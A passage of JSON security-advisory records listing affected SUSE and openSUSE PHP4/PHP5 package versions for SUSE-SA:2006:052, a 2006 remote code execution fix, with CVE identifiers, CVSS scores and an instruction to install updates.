"packageFilename": "php4-imap-4.4.0-6.18.i586.rpm", "packageName": "php4-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-mysqli-5.0.3-14.27.x86_64.rpm", "packageName": "php5-mysqli", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-imap-5.1.2-29.14.i586.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-exif-5.1.2-29.14.s390x.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-wddx-5.1.2-29.14.x86_64.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-gd-5.0.3-14.27.x86_64.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-curl-5.1.2-29.14.i586.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-ftp-5.1.2-29.14.ppc.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-iconv-5.1.2-29.14.x86_64.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-mysql-5.0.4-9.17.ppc.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-ftp-5.0.3-14.27.x86_64.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-imap-5.1.2-29.14.ppc.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-dba-5.1.2-29.14.x86_64.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-mysql-5.1.2-29.14.i586.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-imap-5.1.2-29.14.ia64.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "x86_64", "packageFilename": "php4-gd-4.3.10-14.28.x86_64.rpm", "packageName": "php4-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-5.0.4-9.17.i586.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-bcmath-5.0.4-9.17.x86_64.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-iconv-5.1.2-29.14.ppc.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "i586", "packageFilename": "mod_php4-servlet-4.3.10-14.28.i586.rpm", "packageName": "mod_php4-servlet", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-mbstring-5.1.2-29.14.ppc.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-iconv-5.1.2-29.14.x86_64.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "x86_64", "packageFilename": "php4-pgsql-4.4.0-6.18.x86_64.rpm", "packageName": "php4-pgsql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-imap-5.1.2-29.14.x86_64.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "i586", "packageFilename": "php4-session-4.4.0-6.18.i586.rpm", "packageName": "php4-session", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-devel-5.0.4-9.17.ppc.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-iconv-5.1.2-29.14.i586.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-pdo-5.1.2-29.14.x86_64.rpm", "packageName": "php5-pdo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-wddx-5.1.2-29.14.ppc.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-mbstring-5.0.3-14.27.x86_64.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-pear-5.0.4-9.17.i586.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-pgsql-5.1.2-29.14.i586.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-mysql-5.0.4-9.17.x86_64.rpm", "packageName": "php5-mysql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "x86_64", "packageFilename": "php4-pgsql-4.3.8-8.31.x86_64.rpm", "packageName": "php4-pgsql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-xmlrpc-5.1.2-29.14.i586.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-imap-5.1.2-29.14.s390x.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-curl-5.1.2-29.14.ppc.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "x86_64", "packageFilename": "php4-sysvshm-4.3.10-14.28.x86_64.rpm", "packageName": "php4-sysvshm", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-bcmath-5.0.4-9.17.i586.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "i586", "packageFilename": "php4-mbstring-4.4.0-6.18.i586.rpm", "packageName": "php4-mbstring", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "x86_64", "packageFilename": "php4-imap-4.3.10-14.28.x86_64.rpm", "packageName": "php4-imap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-exif-5.1.2-29.14.ia64.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-devel-5.1.2-29.14.i586.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-gd-5.1.2-29.14.ia64.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-imap-5.1.2-29.14.ppc.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-fastcgi-5.1.2-29.14.x86_64.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-bcmath-5.1.2-29.14.i586.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-imap-5.1.2-29.14.i586.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-ftp-5.1.2-29.14.ppc.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-ldap-5.1.2-29.14.ppc.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-ftp-5.0.4-9.17.ppc.rpm", "packageName": "php5-ftp", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "i586", "packageFilename": "php4-sysvshm-4.3.10-14.28.i586.rpm", "packageName": "php4-sysvshm", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-xmlrpc-5.0.3-14.27.i586.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-pgsql-5.1.2-29.14.x86_64.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-pgsql-5.1.2-29.14.ia64.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-xmlrpc-5.1.2-29.14.s390x.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "ppc", "packageFilename": "php4-unixODBC-4.4.0-6.18.ppc.rpm", "packageName": "php4-unixODBC", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-mysqli-5.0.4-9.17.x86_64.rpm", "packageName": "php5-mysqli", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "x86_64", "packageFilename": "php4-pgsql-4.3.10-14.28.x86_64.rpm", "packageName": "php4-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "ppc", "packageFilename": "php4-devel-4.4.0-6.18.ppc.rpm", "packageName": "php4-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "i586", "packageFilename": "php4-wddx-4.3.10-14.28.i586.rpm", "packageName": "php4-wddx", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-5.1.2-29.14.i586.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-mysqli-5.1.2-29.14.i586.rpm", "packageName": "php5-mysqli", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "x86_64", "packageFilename": "php4-imap-4.4.0-6.18.x86_64.rpm", "packageName": "php4-imap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-dom-5.1.2-29.14.i586.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-soap-5.0.3-14.27.x86_64.rpm", "packageName": "php5-soap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-exif-5.0.4-9.17.ppc.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "i586", "packageFilename": "php4-devel-4.4.0-6.18.i586.rpm", "packageName": "php4-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-xmlrpc-5.1.2-29.14.x86_64.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-iconv-5.1.2-29.14.i586.rpm", "packageName": "php5-iconv", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-xmlrpc-5.0.4-9.17.ppc.rpm", "packageName": "php5-xmlrpc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-mysqli-5.1.2-29.14.x86_64.rpm", "packageName": "php5-mysqli", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-wddx-5.1.2-29.14.ppc.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-wddx-5.1.2-29.14.s390x.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "php5-exif-5.0.3-14.27.i586.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-ldap-5.1.2-29.14.x86_64.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-bcmath-5.1.2-29.14.ia64.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "i586", "packageFilename": "apache2-mod_php4-4.3.8-8.31.i586.rpm", "packageName": "apache2-mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "x86_64", "packageFilename": "php5-exif-5.0.4-9.17.x86_64.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-curl-5.1.2-29.14.s390x.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "i586", "packageFilename": "php4-fastcgi-4.3.8-8.31.i586.rpm", "packageName": "php4-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "x86_64", "packageFilename": "php5-exif-5.0.3-14.27.x86_64.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "x86_64", "packageFilename": "php4-4.4.0-6.18.x86_64.rpm", "packageName": "php4", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "apache2-mod_php5-5.1.2-29.14.s390x.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-mbstring-5.1.2-29.14.s390x.rpm", "packageName": "php5-mbstring", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-exif-5.1.2-29.14.ppc.rpm", "packageName": "php5-exif", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "apache2-mod_php5-5.1.2-29.14.ia64.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "ppc", "packageFilename": "php4-fastcgi-4.4.0-6.18.ppc.rpm", "packageName": "php4-fastcgi", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-5.1.2-29.14.s390x.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-devel-5.1.2-29.14.ppc.rpm", "packageName": "php5-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "i586", "packageFilename": "php4-devel-4.3.8-8.31.i586.rpm", "packageName": "php4-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "ppc", "packageFilename": "php5-imap-5.0.4-9.17.ppc.rpm", "packageName": "php5-imap", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-bcmath-5.1.2-29.14.x86_64.rpm", "packageName": "php5-bcmath", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-pgsql-5.1.2-29.14.x86_64.rpm", "packageName": "php5-pgsql", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-pear-5.1.2-29.14.i586.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "i586", "packageFilename": "php4-devel-4.3.10-14.28.i586.rpm", "packageName": "php4-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-ldap-5.0.4-9.17.i586.rpm", "packageName": "php5-ldap", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "4.3.10-14.28", "arch": "x86_64", "packageFilename": "apache2-mod_php4-4.3.10-14.28.x86_64.rpm", "packageName": "apache2-mod_php4", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "i586", "packageFilename": "php4-wddx-4.4.0-6.18.i586.rpm", "packageName": "php4-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.2", "packageVersion": "4.3.8-8.31", "arch": "i586", "packageFilename": "mod_php4-servlet-4.3.8-8.31.i586.rpm", "packageName": "mod_php4-servlet", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-5.1.2-29.14.ia64.rpm", "packageName": "php5", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "x86_64", "packageFilename": "php5-pear-5.1.2-29.14.x86_64.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "i586", "packageFilename": "php4-4.4.0-6.18.i586.rpm", "packageName": "php4", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "s390x", "packageFilename": "php5-gd-5.1.2-29.14.s390x.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-fastcgi-5.0.4-9.17.i586.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-gd-5.0.4-9.17.i586.rpm", "packageName": "php5-gd", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.18", "arch": "i586", "packageFilename": "php4-unixODBC-4.4.0-6.18.i586.rpm", "packageName": "php4-unixODBC", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-fastcgi-5.1.2-29.14.i586.rpm", "packageName": "php5-fastcgi", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.17", "arch": "i586", "packageFilename": "php5-curl-5.0.4-9.17.i586.rpm", "packageName": "php5-curl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-dba-5.1.2-29.14.ppc.rpm", "packageName": "php5-dba", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "i586", "packageFilename": "php5-wddx-5.1.2-29.14.i586.rpm", "packageName": "php5-wddx", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.14", "arch": "ppc", "packageFilename": "php5-dom-5.1.2-29.14.ppc.rpm", "packageName": "php5-dom", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.14", "arch": "ia64", "packageFilename": "php5-pear-5.1.2-29.14.ia64.rpm", "packageName": "php5-pear", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.27", "arch": "i586", "packageFilename": "apache2-mod_php5-5.0.3-14.27.i586.rpm", "packageName": "apache2-mod_php5", "operator": "lt"}], "description": "Various security problems have been fixed in the PHP script language engine and its modules, versions 4 and 5.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "reporter": "Suse", "published": "2006-09-21T10:05:51", "title": "remote code execution in php4,php5", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2006-4486", "CVE-2006-2563", "CVE-2006-4483", "CVE-2006-4484", "CVE-2006-4020", "CVE-2006-4482", "CVE-2006-4481"], "modified": "2006-09-21T10:05:51", "id": "SUSE-SA:2006:052", "href": "http://lists.opensuse.org/opensuse-security-announce/2006-09/msg00018.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:38:06", "references": [], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "apache2-mod_php5", "packageFilename": "apache2-mod_php5-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-wddx", "packageFilename": "php5-wddx-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pdo", "packageFilename": "php5-pdo-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-fastcgi", "packageFilename": "php5-fastcgi-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-imap", "packageFilename": "php4-imap-4.4.0-6.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-exif", "packageFilename": "php5-exif-5.1.2-29.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-imap", "packageFilename": "php5-imap-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-xmlrpc", "packageFilename": "php5-xmlrpc-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-mbstring", "packageFilename": "php4-mbstring-4.4.0-6.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-ldap", "packageFilename": "php5-ldap-5.0.4-9.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-iconv", "packageFilename": "php5-iconv-5.1.2-29.22.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-pear", "packageFilename": "php5-pear-5.1.2-29.22.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-curl", "packageFilename": "php5-curl-5.0.3-14.32.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "9.3", "packageVersion": "5.0.3-14.32", "packageName": "php5-pgsql", "packageFilename": "php5-pgsql-5.0.3-14.32.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5", "packageFilename": "php5-5.1.2-29.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "4.4.0-6.22", "packageName": "php4-curl", "packageFilename": "php4-curl-4.4.0-6.22.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise SDK", "OSVersion": "10", "packageVersion": "5.1.2-29.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.1.2-29.22.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.0", "packageVersion": "5.0.4-9.22", "packageName": "php5-bcmath", "packageFilename": "php5-bcmath-5.0.4-9.22.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "5.1.2-29.22", "packageName": "php5-pdo", "packageFilename": "php5-pdo-5.1.2-29.22.ppc.rpm", "arch": "ppc", 